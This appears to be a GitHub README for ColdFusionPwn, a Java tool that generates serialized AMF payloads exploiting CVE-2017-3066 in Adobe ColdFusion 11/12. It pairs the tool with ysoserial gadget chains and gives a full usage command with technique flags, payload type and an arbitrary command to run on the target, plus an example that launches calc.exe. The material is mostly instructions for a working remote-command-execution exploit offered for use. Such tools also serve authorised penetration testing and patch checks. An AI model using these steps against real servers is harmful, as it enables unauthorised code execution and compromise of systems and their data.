/ColdFusionPwn

Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12

Primary LanguageJavaMIT LicenseMIT

ColdFusionPwn

Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12.

Description

The tool allows you to generate serialized AMF-payloads to exploit the missing input validation of allowed classes. For details see our blog post.

Install

Get the latest version of ysoserial. Get ColdFusionPwn from releases.

Usage

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]
- [-s|-e]         Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type]  ysoserial gadget payload 
- [command]       command to be executed
- [outfile]       output file for the generated payload

It's required to have ColdFusionPwn-0.0.1-SNAPSHOT-all.jar as first entry in the classpath, since the ApacheCommons BeanUtils library shipped with ysoserial is newer (and has a different serialversion uid).

Examples

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf